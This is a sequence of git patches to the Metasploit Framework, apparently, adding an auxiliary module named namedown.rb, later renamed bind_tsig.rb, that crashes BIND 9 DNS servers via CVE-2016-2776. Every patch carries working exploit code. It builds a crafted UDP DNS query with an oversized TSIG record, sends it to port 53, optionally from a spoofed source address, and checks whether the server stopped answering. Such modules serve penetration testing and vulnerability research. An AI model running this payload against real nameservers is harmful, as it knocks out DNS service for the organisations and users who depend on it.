From 143a4af73de8e916de8c125ca132be43e9c3c5a3 Mon Sep 17 00:00:00 2001 From: Ale Date: Thu, 29 Sep 2016 22:14:13 -0300 Subject: [PATCH 1/6] DoS exploit for CVE-2016-2776 --- modules/auxiliary/dos/dns/namedown.rb | 166 ++++++++++++++++++++++++++ 1 file changed, 166 insertions(+) create mode 100755 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb new file mode 100755 index 0000000000..924eb8de83 --- /dev/null +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -0,0 +1,166 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'timeout' +require 'socket' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'BIND 9 DoS CVE-2016-2776', + 'Description' => %q{ + Denial of Service Bind 9 DNS Server CVE-2016-2776. + Critical error condition which can occur when a nameserver is constructing a response. + A defect in the rendering of messages into packets can cause named to exit with an + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed + to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2776' ], + [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + ], + 'DisclosureDate' => '2016-09-27' + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scanner_prescan(batch) + puts ''' + .... + ,.... + ..........7 + 7...............7 + ........ 7.. + .I I. + ., + ~...., 7.. I. + .................... + ......................7 + ........................I + ........................ + .......................... + .......................... + =........................... + ............................ + ............................ + +.........................., + ..........................7 + :......................... + ........................ + +...................., + 7..................7 + 7~............:7 + 7+,,+777 + ''' + datastore['ScannerRecvWindow'] = 0 + end + + def checkServerStatus(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end + + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end + end + + def scan_host(ip) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + checkServerStatus(ip, rport) + end + + def getDomain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org + end + + def payload + + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x01" # Additional RRs: 1 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001) + + # Aditional records. Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query += "\x00" + + query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query += "\x00\xff" # Class: ANY (0x00ff) + query += "\x00\x00\x00\x00" # Time to live: 0 + query += "\x00\xfc" # Data length: 252 + + # Algorithm Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query += "\x00" + + # Rest of TSIG + query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query += "\x01\x2c" # Fudge: 300 + query += "\x00\x10" # MAC Size: 16 + query += Rex::Text.rand_text_alphanumeric(16) # MAC + query += "\x8f\x65" # Original Id: 36709 + query += "\x00\x00" # Error: No error (0) + query += "\x00\x00" # Other len: 0 + end + + def validQuery + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x00" # Additional RRs: 0 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001)s + end + +end + From c699c7c5064c6d9bc7a25c27a2abf2998a479296 Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:42:30 -0300 Subject: [PATCH 2/6] Fixing MSF Code Style --- modules/auxiliary/dos/dns/namedown.rb | 71 ++++++++------------------- 1 file changed, 21 insertions(+), 50 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 924eb8de83..1ac4ca0026 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2016-2776' ], [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], - 'DisclosureDate' => '2016-09-27' + 'DisclosureDate' => 'Sep 27 2016', + { + 'ScannerRecvWindow' => 0 + } )) register_options([ @@ -45,70 +48,38 @@ class MetasploitModule < Msf::Auxiliary deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def scanner_prescan(batch) - puts ''' - .... - ,.... - ..........7 - 7...............7 - ........ 7.. - .I I. - ., - ~...., 7.. I. - .................... - ......................7 - ........................I - ........................ - .......................... - .......................... - =........................... - ............................ - ............................ - +.........................., - ..........................7 - :......................... - ........................ - +...................., - 7..................7 - 7~............:7 - 7+,,+777 - ''' - datastore['ScannerRecvWindow'] = 0 - end - def checkServerStatus(ip, rport) res = "" sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) - print_good("Exploit Success (Maybe, nameserver did not replied)") - else - print_error("Exploit Failed") - end + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + checkServerStatus(ip, rport) end def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org end def payload - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 @@ -125,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) From bd96380d1904944289921efa5b8815b1ab8cf8bc Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:50:58 -0300 Subject: [PATCH 3/6] Fix in ScannerRecvWindow Declaration --- modules/auxiliary/dos/dns/namedown.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 1ac4ca0026..3ec6dff519 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -35,9 +35,7 @@ class MetasploitModule < Msf::Auxiliary [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', - { - 'ScannerRecvWindow' => 0 - } + 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ From 066df5f1a96acda16fc285c3c52528604d749b8c Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 14:19:43 -0300 Subject: [PATCH 4/6] Fix msftidy warnings --- modules/auxiliary/dos/dns/namedown.rb | 64 +++++++++++++-------------- 1 file changed, 32 insertions(+), 32 deletions(-) mode change 100755 => 100644 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb old mode 100755 new mode 100644 index 3ec6dff519..4064407d42 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -8,12 +8,12 @@ require 'timeout' require 'socket' class MetasploitModule < Msf::Auxiliary - + include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Dos include Msf::Auxiliary::Report - + def initialize(info={}) super(update_info(info, 'Name' => 'BIND 9 DoS CVE-2016-2776', @@ -21,13 +21,13 @@ class MetasploitModule < Msf::Auxiliary Denial of Service Bind 9 DNS Server CVE-2016-2776. Critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an - assertion failure in buffer.c while constructing a response to a query that meets certain criteria. - - This assertion can be triggered even if the apparent source address isnt allowed + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed to make queries. }, # Research and Original PoC - msf module author - 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 'License' => MSF_LICENSE, 'References' => [ @@ -42,22 +42,22 @@ class MetasploitModule < Msf::Auxiliary Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) - + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def checkServerStatus(ip, rport) - res = "" - sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + def check_server_status(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(valid_query, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) + if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") @@ -65,16 +65,16 @@ class MetasploitModule < Msf::Auxiliary end def scan_host(ip) - @flag_success = true - print_status("Sending bombita (Specially crafted udp packet) to: "+ip) - scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + check_server_status(ip, rport) end - def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + get_domain = domain+org end def payload @@ -86,15 +86,15 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x01" # Additional RRs: 1 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001) - + # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) @@ -116,8 +116,8 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Other len: 0 end - def validQuery - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + def valid_query + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 @@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Additional RRs: 0 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001)s From c4c133dff835e9baeed20110e726ee2bd8ccfc92 Mon Sep 17 00:00:00 2001 From: Ale Date: Mon, 3 Oct 2016 17:11:04 -0300 Subject: [PATCH 5/6] Fix Web URL --- modules/auxiliary/dos/dns/namedown.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 4064407d42..2a8e2b521c 100644 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ [ 'CVE', '2016-2776' ], - [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} From f9a2c3406f86469190222ac52dc57556f472e6c9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Sat, 26 Aug 2017 10:41:10 -0500 Subject: [PATCH 6/6] Clean up module --- modules/auxiliary/dos/dns/bind_tsig.rb | 99 ++++++++++++++++++ modules/auxiliary/dos/dns/namedown.rb | 135 ------------------------- 2 files changed, 99 insertions(+), 135 deletions(-) create mode 100644 modules/auxiliary/dos/dns/bind_tsig.rb delete mode 100644 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/bind_tsig.rb b/modules/auxiliary/dos/dns/bind_tsig.rb new file mode 100644 index 0000000000..b88cb02cb6 --- /dev/null +++ b/modules/auxiliary/dos/dns/bind_tsig.rb @@ -0,0 +1,99 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BIND TKEY Query Denial of Service', + 'Description' => %q{ + A defect in the rendering of messages into packets can cause named to + exit with an assertion failure in buffer.c while constructing a response + to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address + isn't allowed to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ + 'Martin Rocha', + 'Ezequiel Tavella', + 'Alejandro Parodi', + 'Infobyte Research Team' + ], + 'References' => [ + ['CVE', '2016-2776'], + ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html'] + ], + 'DisclosureDate' => 'Sep 27 2016', + 'License' => MSF_LICENSE, + 'DefaultOptions' => {'ScannerRecvWindow' => 0} + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scan_host(ip) + if datastore['SRC_ADDR'] + scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR']) + else + print_status("Sending packet to #{ip}") + scanner_send(payload, ip, rport) + end + end + + def payload + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query << "\x00\x00" # Flags: 0x0000 Standard query + query << "\x00\x01" # Questions: 1 + query << "\x00\x00" # Answer RRs: 0 + query << "\x00\x00" # Authority RRs: 0 + query << "\x00\x01" # Additional RRs: 1 + + # Doman Name + query << get_domain # Random DNS Name + query << "\x00" # [End of name] + query << "\x00\x01" # Type: A (Host Address) (1) + query << "\x00\x01" # Class: IN (0x0001) + + # Aditional records. Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query << "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query << "\x00" + + query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query << "\x00\xff" # Class: ANY (0x00ff) + query << "\x00\x00\x00\x00" # Time to live: 0 + query << "\x00\xfc" # Data length: 252 + + # Algorithm Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query << "\x00" + + # Rest of TSIG + query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query << "\x01\x2c" # Fudge: 300 + query << "\x00\x10" # MAC Size: 16 + query << Rex::Text.rand_text_alphanumeric(16) # MAC + query << "\x8f\x65" # Original Id: 36709 + query << "\x00\x00" # Error: No error (0) + query << "\x00\x00" # Other len: 0 + end + + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + domain+org + end +end diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb deleted file mode 100644 index 2a8e2b521c..0000000000 --- a/modules/auxiliary/dos/dns/namedown.rb +++ /dev/null @@ -1,135 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -require 'timeout' -require 'socket' - -class MetasploitModule < Msf::Auxiliary - - include Msf::Exploit::Capture - include Msf::Auxiliary::UDPScanner - include Msf::Auxiliary::Dos - include Msf::Auxiliary::Report - - def initialize(info={}) - super(update_info(info, - 'Name' => 'BIND 9 DoS CVE-2016-2776', - 'Description' => %q{ - Denial of Service Bind 9 DNS Server CVE-2016-2776. - Critical error condition which can occur when a nameserver is constructing a response. - A defect in the rendering of messages into packets can cause named to exit with an - assertion failure in buffer.c while constructing a response to a query that meets certain criteria. - - This assertion can be triggered even if the apparent source address isnt allowed - to make queries. - }, - # Research and Original PoC - msf module author - 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2016-2776' ], - [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] - ], - 'DisclosureDate' => 'Sep 27 2016', - 'DefaultOptions' => {'ScannerRecvWindow' => 0} - )) - - register_options([ - Opt::RPORT(53), - OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) - ]) - - deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') - end - - def check_server_status(ip, rport) - res = "" - sudp = UDPSocket.new - sudp.send(valid_query, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end - - if(res.length==0) - print_good("Exploit Success (Maybe, nameserver did not replied)") - else - print_error("Exploit Failed") - end - end - - def scan_host(ip) - @flag_success = true - print_status("Sending bombita (Specially crafted udp packet) to: "+ip) - scanner_send(payload, ip, rport) - check_server_status(ip, rport) - end - - def get_domain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - get_domain = domain+org - end - - def payload - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 - query += "\x00\x00" # Flags: 0x0000 Standard query - query += "\x00\x01" # Questions: 1 - query += "\x00\x00" # Answer RRs: 0 - query += "\x00\x00" # Authority RRs: 0 - query += "\x00\x01" # Additional RRs: 1 - - # Doman Name - query += get_domain # Random DNS Name - query += "\x00" # [End of name] - query += "\x00\x01" # Type: A (Host Address) (1) - query += "\x00\x01" # Class: IN (0x0001) - - # Aditional records. Name - query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes - query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" - - query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) - query += "\x00\xff" # Class: ANY (0x00ff) - query += "\x00\x00\x00\x00" # Time to live: 0 - query += "\x00\xfc" # Data length: 252 - - # Algorithm Name - query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes - query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes - query += "\x00" - - # Rest of TSIG - query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART - query += "\x01\x2c" # Fudge: 300 - query += "\x00\x10" # MAC Size: 16 - query += Rex::Text.rand_text_alphanumeric(16) # MAC - query += "\x8f\x65" # Original Id: 36709 - query += "\x00\x00" # Error: No error (0) - query += "\x00\x00" # Other len: 0 - end - - def valid_query - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 - query += "\x00\x00" # Flags: 0x0000 Standard query - query += "\x00\x01" # Questions: 1 - query += "\x00\x00" # Answer RRs: 0 - query += "\x00\x00" # Authority RRs: 0 - query += "\x00\x00" # Additional RRs: 0 - - # Doman Name - query += get_domain # Random DNS Name - query += "\x00" # [End of name] - query += "\x00\x01" # Type: A (Host Address) (1) - query += "\x00\x01" # Class: IN (0x0001)s - end - -end -